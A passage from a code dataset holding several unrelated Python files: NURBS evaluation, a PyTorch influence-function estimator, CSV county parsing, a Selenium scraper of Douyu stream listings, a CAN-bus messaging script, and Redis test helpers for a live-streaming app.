40.0]]\nmWeights = [1.0] * len(ctrlpts)\n\n\n\ndef basis_functions(degree=0, knotvector=(), span=0, knot=0):\n \"\"\" Algorithm A2.2 of The NURBS Book by Piegl & Tiller.\"\"\"\n left = [None for x in range(degree+1)]\n right = [None for x in range(degree+1)]\n N = [None for x in range(degree + 1)]\n\n # N[0] = 1.0 by definition\n N[0] = 1.0\n\n for j in range(1, degree+1):\n left[j] = knot - knotvector[span+1-j]\n right[j] = knotvector[span+j] - knot\n saved = 0.0\n for r in range(0, j):\n temp = N[r] / (right[r+1] + left[j-r])\n N[r] = saved + right[r+1] * temp\n saved = left[j-r] * temp\n N[j] = saved\n\n return N\n\ndef find_span(degree=0, knotvector=(), num_ctrlpts=0, knot=0, tol=0.001):\n \"\"\" Algorithm A2.1 of The NURBS Book by Piegl & Tiller.\"\"\"\n # Number of knots; m + 1\n # Number of control points; n + 1\n # n = m - p - 1; where p = degree\n #m = len(knotvector) - 1\n #n = m - degree - 1\n n = num_ctrlpts - 1\n if abs(knotvector[n + 1] - knot) <= tol:\n return n\n\n low = degree\n high = n + 1\n mid = int((low + high) / 2)\n\n while (knot < knotvector[mid]) or (knot >= knotvector[mid + 1]):\n if knot < knotvector[mid]:\n high = mid\n else:\n low = mid\n mid = int((low + high) / 2)\n\n return mid\n\ndef evaluate_rational():\n \"\"\" Evaluates the NURBS curve.\n\n .. note:: The evaluated surface points are stored in :py:attr:`~curvepts`.\n\n :return: None\n \"\"\"\n mCurvePts = []\n # Algorithm A4.1\n for u in np.arange(0, 1, mDelta):\n span = find_span(mDegree, tuple(knots), len(ctrlpts), u)\n basis = basis_functions(mDegree, tuple(knots), span, u)\n\n curveptw = [0.0, 0.0, 0.0]\n for i in range(0, mDegree + 1):\n curveptw[0] += (basis[i] * mWeights[span - mDegree + i]) * (ctrlpts[span - mDegree + i][0])\n # sum(basis_i_k*weights_i_k*ctrlpts_i)\n curveptw[1] += (basis[i] * mWeights[span - mDegree + i]) * (ctrlpts[span - mDegree + i][1])\n curveptw[2] += (basis[i] * mWeights[span - mDegree + i])\n\n\n # Divide by weight\n curvept = [float(curveptw[0] / curveptw[2]), float(curveptw[1] / curveptw[2])]\n mCurvePts.append(curvept)\n return mCurvePts\n\ndef evaluate_rational_numpy():\n \"\"\" Evaluates the NURBS curve.\n\n .. note:: The evaluated surface points are stored in :py:attr:`~curvepts`.\n\n :return: None\n \"\"\"\n mCurvePts = []\n\n n_pixels = 100\n dPixel = 1./n_pixels\n pixels = np.arange(0., 1., dPixel)\n\n n_ctrlpts = len(ctrlpts)\n\n spans = ([find_span(mDegree, tuple(knots), n_ctrlpts, pixel) for pixel in pixels])\n bases = ([basis_functions(mDegree, tuple(knots), spans[span], pixel) for span, pixel in enumerate(pixels)])\n\n\n pts = np.zeros((n_ctrlpts, n_pixels))\n\n for c, u in enumerate(np.arange(0., 1., dPixel)):\n basis = bases[c]\n pts_c = np.sum([(basis[i] * mWeights[spans[c] - mDegree + i]) for i in range(0,mDegree+1)])\n for i in range(0,mDegree+1):\n pts[spans[c] - mDegree + i,c] = (basis[i] * mWeights[spans[c] - mDegree + i])/pts_c\n\n\n\n\n return pts\n\n#pts = evaluate_rational_numpy()\n\ndef evaluate_rational_sliceable(xs):\n \"\"\" Evaluates the NURBS curve.\n\n .. note:: The evaluated surface points are stored in :py:attr:`~curvepts`.\n\n :return: None\n \"\"\"\n mCurvePts = []\n\n n_xs = np.size(xs)\n\n n_ctrlpts = len(ctrlpts)\n\n spans = ([find_span(mDegree, tuple(knots), n_ctrlpts, x) for x in xs])\n bases = ([basis_functions(mDegree, tuple(knots), spans[i], x) for i, x in enumerate(xs)])\n\n\n pts = np.zeros((n_ctrlpts, n_xs))\n\n for c, u in enumerate(xs):\n basis = bases[c]\n pts_c = np.sum([(basis[i] * mWeights[spans[c] - mDegree + i]) for i in range(0,mDegree+1)])\n for i in range(0,mDegree+1):\n pts[spans[c] - mDegree + i,c] = (basis[i] * mWeights[spans[c] - mDegree + i])/pts_c\n\n\n\n\n return pts\n\npts = evaluate_rational_sliceable(np.arange(0,1,0.01))\n\nxs = np.array(ctrlpts)\nx = np.dot(pts.transpose(),xs[:,0])\ny = np.dot(pts.transpose(),xs[:,1])\n\nplt.plot(x,y)\nplt.show()\n","sub_path":"play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"570104801","text":"import utility\nimport torch\nfrom torch.autograd import grad\n\n\ndef s_test(z_test, t_test, model, z_loader, gpu=-1, damp=0.01, scale=25.0, repeat=5000):\n \"\"\"s_test can be precomputed for each test point of interest, and then\n multiplied with grad_z to get the desired value for each training point.\n Here, strochastic estimation is used to calculate s_test.\n\n Arguments:\n z_test: torch tensor, test data points, such as test images\n t_test: torch tensor, test data labels\n model: torch NN, model used to evaluate the dataset\n z_loader: torch Dataloader, can load the training dataset\n gpu: int, GPU id to use if >=0 and -1 means use CPU\n damp: float, dampening factor\n scale: float, scaling factor\n repeat: int, number of iterations aka recursion depth\n\n Returns:\n h_estimate: list of torch tensors, s_test\"\"\"\n v = grad_z(z_test, t_test, model, gpu)\n h_init_estimates = v.copy()\n\n for _ in utility.create_progressbar(repeat, desc='s_test'):\n # take just one random sample from training dataset\n # easiest way to just use the DataLoader once\n for x, t in z_loader:\n if gpu >= 0:\n x, t = x.cuda(gpu), t.cuda(gpu)\n y = model(x)\n loss = model.calc_loss(y, t)\n hv = hvp(loss, list(model.parameters()), h_init_estimates)\n # Recursively caclulate h_estimate\n h_estimate = [\n _v + (1 - damp) * h_estimate - _hv / scale\n for _v, h_estimate, _hv in zip(v, h_init_estimates, hv)]\n # h_estimate = []\n # for _v, h_estimate, _hv in zip(v, h_init_estimates, hv):\n # h_estimate = (_v + (1 - damp) * h_estimate - _hv / scale)\n break\n return h_estimate\n\n\ndef grad_z(z, t, model, gpu=-1):\n \"\"\"Calculates the gradient\n\n Arguments:\n z: torch tensor, training data points\n e.g. an image sample (batch_size, 3, 256, 256)\n t: torch tensor, training data labels\n model: torch NN, model used to evaluate the dataset\n gpu: int, device id to use for GPU, -1 for CPU\n\n Returns:\n grad_z: list of torch tensor, containing the gradients\n from model parameters to loss\"\"\"\n model.eval()\n # initialize\n if gpu >= 0:\n z, t = z.cuda(gpu), t.cuda(gpu)\n model.cuda(gpu)\n y = model(z)\n loss = model.calc_loss(y, t)\n # Compute sum of gradients from model parameters to loss\n return list(grad(loss, list(model.parameters()), create_graph=True))\n\n\ndef hvp(y, w, v):\n \"\"\"Multiply the Hessians of y and w by v.\n Uses a backprop-like approach to compute the product between the Hessian\n and another vector efficiently, which even works for large Hessians.\n Example: if: y = 0.5 * w^T A x then hvp(y, w, v) returns and expression\n which evaluates to the same values as (A + A.t) v.\n\n Arguments:\n y: scalar, for example the output of the loss function\n w: list of torch tensors, tensors over which the Hessian\n should be constructed\n v: list of torch tensors, same shape as w,\n will be multiplied with the Hessian\n\n Returns:\n return_grads: list of torch tensors, contains product of Hessian and v.\n\n Raises:\n ValueError: `y` and `w` have a different length.\"\"\"\n if len(w) != len(v):\n raise(ValueError(\"w and v must have the same length.\"))\n\n # First backprop\n first_grads = grad(y, w, retain_graph=True, create_graph=True)\n\n # Elementwise products\n elemwise_products = 0\n for grad_elem, v_elem in zip(first_grads, v):\n elemwise_products += torch.sum(grad_elem * v_elem)\n\n # Second backprop\n return_grads = grad(elemwise_products, w, create_graph=True)\n\n return return_grads\n\n\nif __name__ == '__main__':\n from trainer_mnist import MnistTrainer\n from net import Net\n from optimizers import MomentumSGD\n model = Net()\n optimizer = MomentumSGD(model, 0, 0)\n main = MnistTrainer(model, optimizer, train_batch_size=1)\n z_test, t_test = main.test_loader.dataset[0]\n z_test = main.test_loader.collate_fn([z_test])\n t_test = main.test_loader.collate_fn([t_test])\n test = s_test(z_test, t_test, model, main.train_loader, gpu=-1)\n","sub_path":"influence_function.py","file_name":"influence_function.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"35423449","text":"# Logic for reading data points out of a CSV file.\n# We have three possible column formats; this uses a different function\n# to retrieve counties from the database depending on the the format\n# choice that is passed in at runtime\n\nimport csv\n\nfrom hda_privileged.models import US_State, US_County, Data_Point\n\n# constants\n\nCHOICE_NAME = \"NAME\"\nCHOICE_1FIPS = \"1FIPS\"\nCHOICE_2FIPS = \"2FIPS\"\n\nUPLOAD_FORMAT_CHOICES = [\n (CHOICE_NAME, \"Use state name ('State') and county name ('County')\"),\n (CHOICE_1FIPS, \"Use single 5-digit FIPS code ('FIPS')\"),\n (CHOICE_2FIPS, \"Use 2-digit state ('State') and 3-digit county ('County') FIPS codes\"),\n]\n\n\n# Regardless of whether the file was using 5-digit FIPS codes or split ones,\n# the heavy lifting of FIPS code matching is done here: both get_county_2fips\n# and get_county_1fips call this method after extracting the appropriate codes\n# from the CSV rows.\ndef get_county_with_fips(state_fips, county_fips):\n \"\"\"\n\n :param state_fips: eg: '01'\n :param county_fips: eg: '001'\n\n \"\"\"\n try:\n state = US_State.objects.get(fips=state_fips)\n county = state.counties.get(fips=county_fips)\n return (county, None)\n except US_State.DoesNotExist:\n msg = {county_fips:state_fips}\n return (None, msg)\n except US_County.DoesNotExist:\n msg = {county_fips: state_fips}\n return (None, msg)\n\n# Defines functions that can translate a DictReader row into a county model object\n# based on the selected column format. e.g. if 'choice' is 'NAME', we want a\n# function that takes in a DictReader row and uses the state name and county name\n# to query and return a unique US_County instance.\n# These functions have the signature:\n# func(row: dict): (US_County, None) | (None, String)\n# i.e. they return a tuple where either the first member is a county instance,\n# OR the second member is an error message.\n\n\ndef get_county_with_2fips(row):\n \"\"\"\n\n :param row: breaks the combination of state_fips and county_fips into state_fips and county_fips respectively\n\n \"\"\"\n state_fips = row['State']\n county_fips = row['County']\n return get_county_with_fips(state_fips, county_fips)\n\n\ndef get_county_with_1fips(row):\n \"\"\"\n\n :param row: combination of state_fips and county_fips\n\n \"\"\"\n fips = row['FIPS']\n state_fips = fips[0:2]\n county_fips = fips[2:5]\n return get_county_with_fips(state_fips, county_fips)\n\n\ndef get_county_with_name(row):\n \"\"\"\n\n :param row: reads the state and county name\n\n \"\"\"\n state_name = row['State']\n county_name = row['County']\n try:\n state = US_State.objects.get(full=state_name)\n except US_State.DoesNotExist:\n msg = {county_name: state_name}\n return (None, msg)\n # can't use get with startswith for counties, because of situations like:\n # Clay County, GA and Clayton County, GA\n # trying to use startswith=Clay will match both of these\n # county = state.counties.get(name__startswith=county_name)\n possible_counties = state.counties.filter(name__startswith=county_name)\n # how do we narrow this down?\n if possible_counties.count() == 1:\n return (possible_counties.first(), None)\n elif possible_counties.count() > 1:\n # if we matched a substring of multiple county names, prefer the shortest as being\n # the most exact; first evaluate the query\n county_iter = possible_counties.iterator()\n # sort in ascending order of name length, returning a list\n shortest_first = sorted(county_iter, key=lambda c: len(c.name))\n # return the first county (shortest name)\n return (shortest_first[0], None)\n else:\n msg = {county_name: state_name}\n return (None, msg)\n\n# map choice options to the appropriate function for parsing counties\nUPLOAD_FORMAT_FUNCTIONS = {\n CHOICE_1FIPS: get_county_with_1fips,\n CHOICE_2FIPS: get_county_with_2fips,\n CHOICE_NAME: get_county_with_name,\n}\n\n\ndef read_data_points_from_file(file, choice, data_set):\n \"\"\"Reads all the data points from a CSV file, adding them to the given data set.\n\n :param file: user's selected csv file\n :param choice: one of the choice codes from UPLOAD_FORMAT_CHOICES\n :param CHOICE_NAME: assume the State and County columns contain full names in each row\n :param CHOICE_1FIPS: assume there is one column to uniquely identify the county\n :param CHOICE_2FIPS: assume the State and County columns contain 2 FIPS: codes\n :param data_set: a Data_Set model instance\n :returns: A list of Data_Point model objects, one per row in the CSV file, all pointing to\n the indicated Data_Set instance.\n\n \"\"\"\n county_getter = UPLOAD_FORMAT_FUNCTIONS.get(choice, None)\n if not county_getter:\n raise TypeError(f\"Choice {choice} did not match to a county parsing function\")\n\n unsuccessful_counties_datapoints = {}\n successful_counties_datapoints = []\n\n count = 0\n for row in csv.DictReader(file):\n # read a row\n (county, error) = county_getter(row)\n # handle the results\n if county is not None:\n # if there is no value, do not specify a default here:\n # leave it blank/None when creating the Data Point and let\n # the model implementation handle defaults.\n value_str = row.get('Value', None)\n value = float(value_str) if value_str else None\n # create and collect (but do not save!) the data point\n data_point = Data_Point(county=county, data_set=data_set, value=value)\n successful_counties_datapoints.append(data_point)\n elif error is not None:\n unsuccessful_counties_datapoints.update(error)\n # increment a row counter\n count += 1\n\n return successful_counties_datapoints, unsuccessful_counties_datapoints\n","sub_path":"hda_privileged/upload_reading.py","file_name":"upload_reading.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"527502785","text":"import numpy as np\nfrom typing import List, Callable\n\n# np.ndarray를 인자로 받고 np.ndarray를 반환하는 함수\nArray_Function = Callable[[np.ndarray], np.ndarray]\n\n# Chain은 함수의 리스트다.\nChain = List[Array_Function]\n\ndef chain_deriv_3(chain: Chain, input_range: np.ndarray) -> np.ndarray:\n '''\n 세 함수로 구성된 합성함수의 도함수를 계산하기 위해 연쇄법칙을 사용함\n '''\n \n assert len(chain) == 3, \\\n \"인자 chain의 길이는 3이어야 함\"\n \n f1 = chain[0]\n f2 = chain[1]\n f3 = chain[2]\n \n # f1(x)\n f1_of_x = f1(input_range)\n \n # f2(f1(x))\n f2_of_x = f2(f1_of_x)\n \n # df3du\n df3du = deriv(f3, f2_of_x)\n \n # df2du\n df2du = deriv(f2, f1_of_x)\n \n # df1dx\n df1dx = deriv(f1, input_range)\n \n # 각 점끼리 값을 곱함\n return df1dx * df2du * df3du\n","sub_path":"chain_deriv_3.py","file_name":"chain_deriv_3.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"41830678","text":"import json\nimport time\n\nfrom selenium import webdriver\n\n\nclass SaveItem:\n '''保存数据'''\n def __init__(self):\n self.data = {}\n\nclass DouyuSpider(object):\n '''爬取数据'''\n def __init__(self):\n # 定义起始url\n self.start_url = 'https://www.douyu.com/directory/all'\n # 实例化driver对象\n self.driver = webdriver.Chrome()\n self.save_item = SaveItem()\n\n def get_content_list(self):\n # 获取url\n li_list = self.driver.find_elements_by_xpath('//ul[@id=\"live-list-contentbox\"]/li')\n content_list = []\n for li in li_list:\n item = {}\n item['room_img'] = li.find_element_by_xpath(\".//span[@class='imgbox']/img\").get_attribute(\"src\")\n item['room_title'] = li.find_element_by_xpath(\"./a\").get_attribute('title')\n item['room_cate'] = li.find_element_by_xpath(\".//span[@class='tag ellipsis']\").text\n item['anchor_name'] = li.find_element_by_xpath(\".//span[@class='dy-name ellipsis fl']\").text\n item['watch_num'] = li.find_element_by_xpath(\".//span[@class='dy-num fr']\").text\n content_list.append(item)\n next_url_list = self.driver.find_elements_by_xpath('//div[@id=\"J-pager\"]/a[@class=\"shark-pager-next\"]')\n next_url = next_url_list[0] if len(next_url_list) > 0 else None\n return content_list, next_url\n\n def run(self): # 实现主要逻辑\n # 对起始url发送请求\n self.driver.get(self.start_url)\n\n # 关闭提示弹窗, 没有弹窗则需要注释掉\n # self.driver.find_element_by_class_name('pop-zoom-hide').click()\n # time.sleep(1)\n\n # 提取数据, 提取下一页元素\n content_list, next_url = self.get_content_list()\n\n # 保存数据\n count = 1\n self.save_item.data[count] = content_list\n\n # 点击下一页元素, 循环\n while next_url != None:\n print(count)\n next_url.click()\n time.sleep(2)\n content_list, next_url = self.get_content_list()\n count += 1\n self.save_item.data[count] = content_list\n self.driver.close()\n with open('douyu02018_12_17.json', 'w', encoding='utf-8') as fp:\n json.dump(self.save_item.data, fp, ensure_ascii=False, indent=4)\n\nif __name__ == '__main__':\n douyu = DouyuSpider()\n douyu.run()\n print('ok')","sub_path":"douyu_spider.py","file_name":"douyu_spider.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"246732186","text":"\"\"\"Resolwe entity serializer.\"\"\"\nfrom resolwe.flow.models import Collection, Entity\n\nfrom .collection import BaseCollectionSerializer\nfrom .fields import DictRelatedField\n\n\nclass EntitySerializer(BaseCollectionSerializer):\n \"\"\"Serializer for Entity.\"\"\"\n\n collection = DictRelatedField(\n queryset=Collection.objects.all(),\n serializer=BaseCollectionSerializer,\n allow_null=True,\n required=False,\n write_permission=\"edit\",\n )\n\n class Meta(BaseCollectionSerializer.Meta):\n \"\"\"EntitySerializer Meta options.\"\"\"\n\n model = Entity\n fields = BaseCollectionSerializer.Meta.fields + (\n \"collection\",\n \"duplicated\",\n \"type\",\n )\n\n def update(self, instance, validated_data):\n \"\"\"Update.\"\"\"\n source_collection = instance.collection\n instance = super().update(instance, validated_data)\n instance.move_to_collection(source_collection, instance.collection)\n\n return instance\n","sub_path":"resolwe/flow/serializers/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"149807447","text":"import sys\nsys.stdin = open('파핑1.txt','r')\ndef p(board):\n for b in board:\n print(b)\n print('')\n\n\ndef mine(arr,N):\n global di, dj\n for i in range(N):\n for j in range(N):\n if arr[i][j] == -1: # 지뢰이면\n for k in range(8):\n ni = i + di[k]\n nj = j + dj[k]\n if 0<=ni0:\n cnt += 1\n print('#{} {}'.format(tc,cnt))","sub_path":"1113/파핑답.py","file_name":"파핑답.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"103805066","text":"#!/usr/bin/env python\n'''\nCreated on 29.09.2020\n\n@author: Marcel Gruber\n\nThis script recievs, send and stores data send by a connected Microcontroller. \nAll parameters can be set by flags or in the attached config.py file.\nIf you choose to use flags, they are used instead of the configuration.\n'''\nimport can\nfrom can.bus import BusState\n\nimport config\nimport os\nimport argparse, sys\nfrom datetime import datetime\nimport time\nimport threading\n\ncan_bustype = 'vector' \nappname = 'CANalyzer'\ncan_channel = 1\ncan_bitrate = 500000\nfilename = 'data_logger'\ninterface = True\n\n\n\ndef receive_all():\n #Receives all messages and prints them to the console until Ctrl+C is pressed.\n\n with can.interface.Bus(\n bustype='vector', app_name='CANalyzer', channel=1, bitrate=500000\n ) as bus:\n # set to read-only, only supported on some interfaces\n #bus.state = BusState.PASSIVE\n\n try:\n while True:\n msg = bus.recv(1)\n if msg is not None:\n print(msg)\n if stop_threads:\n break\n\n except KeyboardInterrupt:\n pass # exit normally\n\ndef convert_message():\n #Convert all messages\n pass\n\ndef send_one(can_command):\n #Sends a single message.\n\n # this uses the default configuration (for example from the config file)\n # see https://python-can.readthedocs.io/en/stable/configuration.html\n with can.interface.Bus(\n bustype='vector', app_name='CANalyzer', channel=1, bitrate=500000\n ) as bus:\n\n # Using specific buses works similar:\n # bus = can.interface.Bus(bustype='socketcan', channel='vcan0', bitrate=250000)\n # bus = can.interface.Bus(bustype='pcan', channel='PCAN_USBBUS1', bitrate=250000)\n # bus = can.interface.Bus(bustype='ixxat', channel=0, bitrate=250000)\n # bus = can.interface.Bus(bustype='vector', app_name='CANalyzer', channel=1, bitrate=500000)\n\n msg = can.Message(\n arbitration_id=0x10, data=[can_command, 25, 0, 1, 3, 1, 4, 1], is_extended_id=False\n )\n\n try:\n bus.send(msg)\n print(\"Message sent on\"+bus.channel_info)\n print(\"Command: \"+str(msg))\n except can.CanError:\n print(\"Message NOT sent\")\n\ndef send_status():\n # Identifier 10\n # DLC 1\n # Data 7 (Command) 0\n pass\ndef config_interface(can_bustype, appname, can_channel, can_bitrate, filename, interface,):\n #Dialog to start script\n print(\"Config CAN BUS\")\n print(\"##################\")\n can_bustype = input(\"Bustype:\") or can_bustype\n appname = input(\"Only Vector Hardware needed Appname:\") or appname #\"ivas_\"+time.strftime(\"%Y_%m_%d-%H_%M_%S\")\n can_channel = input(\"Channel 0 or 1: \") or can_channel\n can_bitrate = input(\"Bitrate of CAN: \") or can_bitrate\n filename = input(\"Filename to save the data: \") or filename\n print(\"###########################################\")\n print(\"#INFO######################################\")\n print(\"Interface Bus: Bustype=\"+str(can_bustype)+\", AppName= \"+appname+\", Channel= \"+str(can_channel)+\", Bitrate= \"+str(can_bitrate))\n print(\"Filename :\"+filename+\".txt\")\n print(\"###########################################\")\n\n return can_bustype, appname, can_channel, can_bitrate, filename, interface\n\n\ndef logging(can_bustype, appname, can_channel, can_bitrate, filename, interface):\n pass\n \ndef interact(can_bustype, appname, can_channel, can_bitrate, filename, interface):\n #Dialog to start script\n if interface:\n can_bustype, appname, can_channel, can_bitrate, filename, interface = config_interface(can_bustype, appname, can_channel, can_bitrate, filename, interface)\n\n with can.interface.Bus(\n bustype=can_bustype,\n app_name=appname,\n channel=can_channel,\n bitrate=can_bitrate\n ) as bus:\n \n # Using specific buses works similar:\n # bus = can.interface.Bus(bustype='socketcan', channel='vcan0', bitrate=250000)\n # bus = can.interface.Bus(bustype='pcan', channel='PCAN_USBBUS1', bitrate=250000)\n # bus = can.interface.Bus(bustype='ixxat', channel=0, bitrate=250000)\n # bus = can.interface.Bus(bustype='vector', app_name='CANalyzer', channel=1, bitrate=500000)\n\n msg = can.Message(\n arbitration_id=0x10, data=[4, 25, 0, 1, 3, 1, 4, 1], is_extended_id=False\n )\n\n try:\n bus.send(msg)\n print(\"Message sent on\"+bus.channel_info)\n print(\"Command: \"+str(msg))\n except can.CanError:\n print(\"Message NOT sent\")\n\n\nif __name__ == \"__main__\":\n stop_threads = False\n t1 = threading.Thread(target=receive_all)\n t2 = threading.Thread(target=interact(can_bustype, appname, can_channel, can_bitrate, filename, interface))\n t1.start()\n t2.start()\n\n q = ''\n while q != 'q':\n print(\"###\")\n q = input()\n\n stop_threads = True\n t1.join()\n \n print('finish')\n\n\n\n '''\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--mode\", help=\"Decide between Interact or logging\", default=\"interact\")\n parser.add_argument(\"--bustype\", help=\"Type of Bus\", default='vector')\n parser.add_argument(\"--app_name\", help=\"Needed only with Vector Hardware\", default=\"CANalyzer\")\n parser.add_argument(\"--channel\", help=\"Channel 0 or 1\", type=int, default=1)\n parser.add_argument(\"--bitrate\", help=\"Baudrate of CAN\", type=int, default=500000)\n parser.add_argument(\"--display\", action='store_true', required=False)\n\n parser.add_argument(\"--filename\", help=\"Filename to store the data\")\n parser.add_argument(\"--interface\", action=\"store_true\", help=\"enables user-friendly interface for parameter input\")\n\n args = parser.parse_args()\n\n mode = args.mode if args.mode else config.mode\n\n if mode == 'interact':\n can_bustype = args.bustype if args.bustype else config.bustype\n appname = args.app_name if args.app_name else config.app_name\n can_channel = args.channel if args.channel else config.channel\n can_bitrate = args.bitrate if args.bitrate else config.bitrate\n filename = args.filename if args.filename else config.filename\n interface = args.interface if args.interface else config.interface\n\n interact(can_bustype, appname, can_channel, can_bitrate, filename, interface)\n\n if mode == 'logging':\n can_bustype = args.bustype if args.bustype else config.bustype\n appname = args.app_name if args.app_name else config.app_name\n can_channel = args.channel if args.channel else config.channel\n can_bitrate = args.bitrate if args.bitrate else config.bitrate\n filename = args.filename if args.filename else config.filename\n interface = args.interface if args.interface else config.interface\n\n interact(can_bustype, appname, can_channel, can_bitrate, filename, interface)\n'''\n\n\"\"\"\n except OSError as e: # FileExistsError:\n logging.error(\"Could not create database (file exists?)\")\n logging.debug(e)\n except KeyboardInterrupt:\n logging.info(\"Got keyboard interrupt\")\n #logging.info(\"stored data in: \" + file + ', ' + csv_path + ', ' + csv_path.replace('.csv', '_high_acc.csv') )\n \"\"\"","sub_path":"can_data.py","file_name":"can_data.py","file_ext":"py","file_size_in_byte":7396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"134957994","text":"# -*- coding:utf-8 -*-\nfrom base.base_redis import BaseRedis\nimport datetime\nimport json\nimport settings\n\nclass Redis(BaseRedis):\n\n def get_image_captcha(self, device_id):\n # 获取图形验证码\n redis_value = self.get(\"LOGIN_CODE_{0}\".format(device_id))\n return redis_value\n\n def delete_image_captcha(self, device_id):\n # 删除图形验证码\n self.delete(\"LOGIN_CODE_{0}\".format(device_id))\n\n def clean_user_bean(self,user_id):\n # 删除用户大王豆\n self.delete(key='REDIS##BEAN##{0}'.format(user_id))\n\n def clean_user_buy_guard(self, user_id, anchor_id):\n # 清除用户守护信息\n self.delete(key='ROOM_USER_GUARD_FROM_ANCHOR_{0}'.format(anchor_id))\n self.hdel(name='ROOM_USER_GUARD_LIST', key='{0}_{1}'.format(anchor_id, user_id))\n self.hdel(name='ROOM_USER_GUARD_INFO_LIST', key=anchor_id)\n self.delete(key='I_GUARD_ANCHORS_REDIS_{0}'.format(user_id))\n\n def clean_black_user(self, anchor_id):\n # 清除黑名单\n self.hdel(name='YL_ROOM_BLACK_USER', key=anchor_id)\n\n def clean_red_packet(self, room_id, red_packet_id):\n # 清除红包信息\n self.delete(key='ACT_RED_PACKET_REDIS_REDPACKET_{0}_{1}'.format(room_id, red_packet_id))\n self.delete(key='ACT_RED_PACKET_REDIS__GET_LIST_{0}_{1}'.format(room_id, red_packet_id))\n self.delete(key='ACT_RED_PACKET_REDIS_{0}'.format(room_id))\n self.hdel(name='ACT_RED_PACKET_REDIS__LIST_', key=room_id)\n\n def clean_anchor_group(self, user_id, anchor_id):\n # 清除主播团信息\n self.hdel(name='ANCHOR_GROUP_KEY', key=user_id)\n self.hdel(name='ANCHOR_GROUP_KEY_ANCHOR_INFO', key=anchor_id)\n self.srem('ANCHOR_GROUP_KEY_{0}'.format(user_id), '{0}'.format(anchor_id))\n\n def clean_user_plat_signin(self, user_id):\n # 清除平台签到\n self.hdel(name='PLAT_SIGN_IN_USER', key=user_id)\n\n def clean_check_mobile_code(self, user_id):\n # 清除用户是否绑定手机号\n self.delete(key='check_moble_code_{0}'.format(user_id))\n\n def clean_user_task(self, user_id):\n # 清除用户任务信息\n self.delete(key='YL_USER_DAILY_TASK_REDIS_{0}_{1}'.format(user_id, datetime.datetime.now().strftime(\"%Y%m%d\")))\n self.hdel(name='YL_USER_ONCE_TASK_REDIS_bind_mobile', key=user_id)\n\n def set_anchor_group_anchor_end_time(self, anchor_id, end_time):\n # 修海主播在主播团内过期时间\n details = self.hget(name='ANCHOR_GROUP_KEY_ANCHOR_INFO', key=anchor_id)\n details_dic = json.loads(details)\n details_dic['end_time'] = int(end_time)\n self.hset(name='ANCHOR_GROUP_KEY_ANCHOR_INFO', key=anchor_id,content=json.dumps(details_dic))\n\n def set_red_packet_end_time(self, room_id, red_packet_id, end_time):\n # 修改红包过期时间\n details = self.hget(name='ACT_RED_PACKET_REDIS_{0}'.format(room_id),key='DATA_{0}'.format(red_packet_id))\n details_dic = json.loads(details)\n details_dic['end_time'] = int(end_time)\n self.hset(name='ACT_RED_PACKET_REDIS_{0}'.format(room_id),key='DATA_{0}'.format(red_packet_id), content=json.dumps(details_dic))\n\n def set_user_plat_signin_day(self,user_id, day_num):\n # 修改平台签到天数\n details = self.hget(name='PLAT_SIGN_IN_USER', key=user_id)\n details_dic = json.loads(details)\n details_dic['signin_next_date'] = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n details_dic['signin_last_date'] = (datetime.datetime.now() + datetime.timedelta(days=-1)).strftime(\"%Y-%m-%d\")\n details_dic['signin_series_num'] = int(day_num)\n self.hset(name='PLAT_SIGN_IN_USER', key=user_id, content=json.dumps(details_dic))\n\n def check_anchor_dynamic(self,dynamic_id, status=1):\n # 模拟审核主播动态\n details = self.hget(name='USER_DYNAMIC_REDIS_DATA', key=dynamic_id)\n details_dic = json.loads(details)\n details_dic['status'] = status\n self.hset( name='USER_DYNAMIC_REDIS_DATA', key=dynamic_id, content=json.dumps(details_dic))\n score = format(float(1) / float(dynamic_id), '.16f')\n self.zadd('USER_DYNAMIC_REDIS_SQUARE', score, dynamic_id)\n\n def fix_dynamic_created_time(self,dynamic_id, created_time):\n # 修改动态的创建时间\n details = self.hget(name='USER_DYNAMIC_REDIS_DATA', key=dynamic_id)\n details_dic = json.loads(details)\n details_dic['create_time'] = created_time\n self.hset(name='USER_DYNAMIC_REDIS_DATA', key=dynamic_id, content=json.dumps(details_dic))\n\n def clean_doll_log(self,user_id,doll_log_id=8888):\n self.hdel(name='doll_log_status', key=doll_log_id)\n self.hdel(name='DOLL_MACHINE_PLAY_SUCCESS_LOG_DATA', key=doll_log_id)\n self.delete('DOLL_MACHINE_USER_LOG_LIST_{0}'.format(user_id))\n\n def add_doll_log(self,user_id, room_id, start_time, end_time, doll_log_id=8888):\n self.hset(name='doll_log_status', key=doll_log_id, content='1')\n self.rpush('DOLL_MACHINE_USER_LOG_LIST_{0}'.format(user_id), doll_log_id)\n details = {\n \"id\": doll_log_id,\n \"user_id\": user_id,\n \"machine_id\": 1,\n \"room_id\": room_id,\n \"doll_id\": 1,\n \"end_time\": end_time,\n \"start_time\": start_time,\n \"status\": 1,\n \"post_time\": None,\n \"name\": None,\n \"mobilephone\": None,\n \"area\": None,\n \"address\": None,\n \"post_id\": None,\n \"post_company\": None,\n \"remarks\": \"\",\n \"operator\": None,\n \"postage\": None,\n \"doll_num\": 1,\n \"apply_time\": None,\n \"order_id\": \"20158692_15110173654985469265879\"\n }\n self.hset(name='DOLL_MACHINE_PLAY_SUCCESS_LOG_DATA', key=doll_log_id,content=json.dumps(details))\n\n def doll_fake_consignment(self,doll_id,post_id,post_company):\n details = 